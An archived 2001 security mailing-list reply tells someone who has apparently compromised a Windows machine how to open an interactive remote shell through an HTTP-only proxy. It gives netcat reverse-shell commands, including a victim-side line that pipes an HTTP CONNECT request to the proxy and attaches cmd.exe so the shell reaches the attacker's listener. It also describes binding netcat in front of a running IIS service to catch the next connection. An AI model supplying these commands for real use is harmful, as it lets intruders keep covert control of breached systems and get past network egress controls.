Hi, > Does anybody know any solution based on the remote shell in Win32 > machines using Reverse Telnet thru Proxies? > The proxy only permits HTTP 80/8080. I think your situation is this: You have owned a machine which is behind a firewall, and it only allows connections out via a proxy, so simple reverse telnet techniques such as 'nc.exe -e cmd.exe myip myport' fail. You could try something like this: Attacker: netcat -v -l -p 80 Victim: echo CONNECT attacker:80 HTTP/1.1 | netcat proxyserver 8080 -e cmd.exe The HTTP/1.1 CONNECT method is the only way I can see you getting a nice interactive command prompt if ports 80/8080 outbound are all you have to play with. Remember that netcat can bind in FRONT of the existing IIS process. If you spawn as netcat listener on 80, 443, 21, etc.. with the '-l' (listen once) option, the next person to connect to that port will get the netcat listener. Any subsequent connections will see the IIS service. cheers .jm ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Fri Oct 19 2001 - 11:39:01 PDT